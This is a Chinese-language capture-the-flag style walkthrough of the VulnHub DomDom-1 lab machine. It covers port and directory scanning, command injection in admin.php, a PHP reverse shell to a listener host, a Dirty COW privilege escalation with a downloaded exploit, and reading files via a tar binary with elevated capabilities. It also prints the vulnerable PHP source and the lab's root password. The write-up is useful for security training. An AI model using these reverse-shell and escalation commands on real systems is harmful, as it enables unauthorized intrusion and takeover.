title: Vulnhub-DomDom-1
categories:
- VulnHub
tags:
- Linux
- nmap
- gobuster
- burpsuite
- 命令执行
- linux-exploit-suggester
- 脏牛
- tar
- PHP
cover: /images/Vulnhub.png
abbrlink: 8c9ce403
date: 2023-02-23 10:11:52
Vulnhub DomDom-1<!--more-->
0x01 靶机介绍
-
Name: DomDom: 1
-
Date release: 11 Jul 2019
-
Author: Avraham Cohen
-
Series: DomDom
靶机下载地址:https://www.vulnhub.com/entry/domdom-1,328/
0x02 侦查
端口探测
首先使用 nmap 进行端口扫描
nmap -p- -sV -sC -A 192.168.0.105 -oA nmap_domdom
扫描结果显示目标开放了80端口
80端口
访问http://192.168.0.105为登录界面
目录扫描
使用 gobuster 进行目录扫描,成功找到admin.php
gobuster dir -u http://192.168.0.105 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php
访问http://192.168.0.105/admin.php出现提示
0x03 上线[www-data]
命令执行
填写用户名、密码后通过 BurpSuite 抓取登录数据包
把index.php修改为admin.php后发现 JavaScript 代码中可传递cmd参数
利用cmd参数执行命令成功,说明存在命令执行漏洞
反弹shell
本地监听6666端口
nc -nvlp 6666反弹shell参考地址:
https://forum.ywhack.com/shell.php通过 PHP 执行经 URL 编码后的反弹shell命令
php -r '$sock=fsockopen("192.168.0.106",6666);exec("/bin/sh -i <&3 >&3 2>&3");'
成功拿到用户权限
python3 -c 'import pty;pty.spawn("/bin/bash")
按ctrl+g退出监听,利用以下命令维持权限
stty raw -echonc -nvlp 6666
0x04 权限提升[root]
信息收集
查询操作系统版本
uname -a
找到admin.php源码如下:
<html><head><title>DomDom</title></head><body>if (isset($_POST['access'])) {<form method="POST"><input type="text" name="cmd" id="cmd" size="200"><br><br><input type="submit" value="Execute"></form><pre>if($_POST['cmd']) {system($_POST['cmd']);}</pre></body><script>document.getElementById("cmd").focus();</script>} else {echo "<h3>Welcome to DomDom !</h3><br>";echo "<p>You need to know it's your actions that will show you the light.</p>";echo "<br><br><br><br><br><br>";echo "<br><br><br><br><br><br>";echo "<br><br><br><br><br><br>";echo "<br><br><br><br><br><br>";echo "<p>Developed by [email protected] !</p>";}</body></html>
git clone https://github.com/mzet-/linux-exploit-suggester.gitpython -m SimpleHTTPServer 80wget http://192.168.0.106/linux-exploit-suggester.shchmod +x linux-exploit-suggester.sh
执行脚本成功发现脏牛漏洞
./linux-exploit-suggester.sh
脏牛提权
下载脏牛提权脚本并编译
wget https://www.exploit-db.com/download/40616mv 40616 cowroot.cgcc cowroot.c -o cowroot -pthread
在本地开启 http 服务
python -m SimpleHTTPServer 80下载利用程序cowroot
wget http://192.168.0.106/cowrootchmod +x cowroot./cowroot
执行后成功拿到root权限
在管理员家目录下拿到Ry{}LJRBS5nc+*V.#a
利用脏牛同样可在 Docker 中提权
git clone https://github.com/gebl/dirtycow-docker-vdso.git上传利用脚本并编译
cd /dirtycow-vdso/make
tar提权
列出指定目录及其子目录下所有文件的扩展属性,成功发现存在tar命令可忽略文件读及目录搜索的DAC访问限制
getcap -r / 2>/dev/null
查询可登录用户只有www-data、domom、root
cat /etc/passwd | grep bash
利用 tar 压缩用户domom目录,解压后在README.md中成功拿到 root 密码为Mj7AGmPR-m&Vf>Ry{}LJRBS5nc+*V.#a
tar -cvf domom.tar /home/domomtar -xvf domom.tarcat README.md
输入密码成功登录服务器
原文始发于微信公众号(狐狸说安全):Vulnhub DomDom-1
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论